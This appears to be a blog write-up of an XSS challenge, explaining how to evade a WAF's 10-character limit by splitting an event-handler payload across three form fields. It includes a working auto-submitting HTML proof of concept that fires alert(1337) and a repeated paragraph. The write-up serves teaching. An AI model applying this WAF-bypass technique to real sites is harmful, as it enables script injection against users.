hi all,
one more amazing topic today about WAF.
The challenge has 3 vulnerable input tags at the value attributes (Address1, Address2, Zip).
Double quotes weren’t filtered so the value attribute quotes can be closed and the input tag can be closed using ‘>’ but you can’t open a new HTML tag using ‘<‘ character as it was getting removed. So the only possible way is to use the event handlers to execute JavaScript, The problem that all event handlers were getting blocked by the WAF. However there was a weakness in the WAF that it only blocks your payload if it exceeded 10 characters.
Double quotes weren’t filtered so the value attribute quotes can be closed and the input tag can be closed using ‘>’ but you can’t open a new HTML tag using ‘<‘ character as it was getting removed. So the only possible way is to use the event handlers to execute JavaScript, The problem that all event handlers were getting blocked by the WAF. However there was a weakness in the WAF that it only blocks your payload if it exceeded 10 characters.
So using a payload like “onfocus= will get accepted and reflected in the response because it’s length is only 9 characters
But using a payload like “onfocus=alert(1) will be rejected and blocked by the WAF beause it’s length is 17 characters.
How to Bypass the WAF and execute Javascript ?
To bypass the WAF, we have to bypass the 10 characters length limitation. This can be done using a simple trick by splitting the XSS payload over the 3 affected input tags in the page. So in first vulnerable input tag you can use the shortest event handler which is oncut and use payload like “oncut=’/* which is exactly 10 characters and in the second vulnerable input tag you can continue the rest of the payload and close the multi line comment */alert(1337)’ as the following.
The payload will look like the following . The “Address Line 1” and “Address Line 2” will act as it was only one input tag
Now if you write anything inside “Address Line 1” field then you cut it using “CTRL + X” , The XSS will be fired.
This solved the challenge but unfortunately it requires a lot of interaction from the user and it’s hard to exploit it in real world
Now let’s dive into more cool solutions for the challenge, i will start with my own solution 
My Solution:
I’ve solved the challenge with a similar technique but using a different event handler which is onblur , it’s longer thanoncut by one character . so using “onblur=’/* will be 11 character and unfortunately it will get blocked by the WAF. So the problem now i need one character to just comment inside the JavaScript to make my payload length is 10 instead of 11, so is that possible ?
Luckily Yes! it’s possible and thanks goes to ES6 (ECMAScript), it provides us with the template strings (accent grave) which are enclosed by the back-ticks . One of the functions of template strings in ES6 is to make a multi line strings . so doing something like
Will appear as two lines with a line break.
So i used the template strings to make the multi line comment inside the javascript using one single character.
Here is the final payload I’ve used to solve the challenge:
| <html> | |
| <!-- XSS Challenge Solution: | |
| Address Line 1: "onblur<='` | |
| Address Line 2: `;alert(1337)'autofocus x=" | |
| Zip Code: "autofocus x= | |
| --> | |
| <body> | |
| <form action="http://xss-challenge.secgeek.net/" method="POST"> | |
| <input type="hidden" name="fullname" value="" /> | |
| <input type="hidden" name="address1" value=""onblur<='`" /> | |
| <input type="hidden" name="address2" value="`;alert(1337)'autofocus x="" /> | |
| <input type="hidden" name="country" value="" /> | |
| <input type="hidden" name="city" value="" /> | |
| <input type="hidden" name="state" value="" /> | |
| <input type="hidden" name="zip" value=""autofocus x=" /> | |
| <input type="hidden" name="user_selected" value="false" /> | |
| </form> | |
| <script>document.forms[0].submit()</script> | |
| </body> | |
| </html>
Solution was simply to use onblur event handler along with autofocus as following
Address Line 1:
Address Line 2:
Zip Code:
The XSS payload will fire when you press a left click with the mouse anywhere inside the page or when you press with the mouse outside the browser window, like on the start menu or the taskbar.
Much better, right
? But it’s still need a mild interaction from the user.
Now let’s shed the light on some of the coolest solutions I’ve received that requires zero user interaction.
The Solution:
finally, solved the challenge with a creative payload that use onblur and autofocus with an extra trick , he use window.open to open the challenge page in a new window then he redirect the location of the window to solved after 2 seconds which makes the address1 field lose it’s focus and the onblur event gets executed without any user interaction!
Thanks for reading blog,please comment below if you have any question. |
No comments:
Post a Comment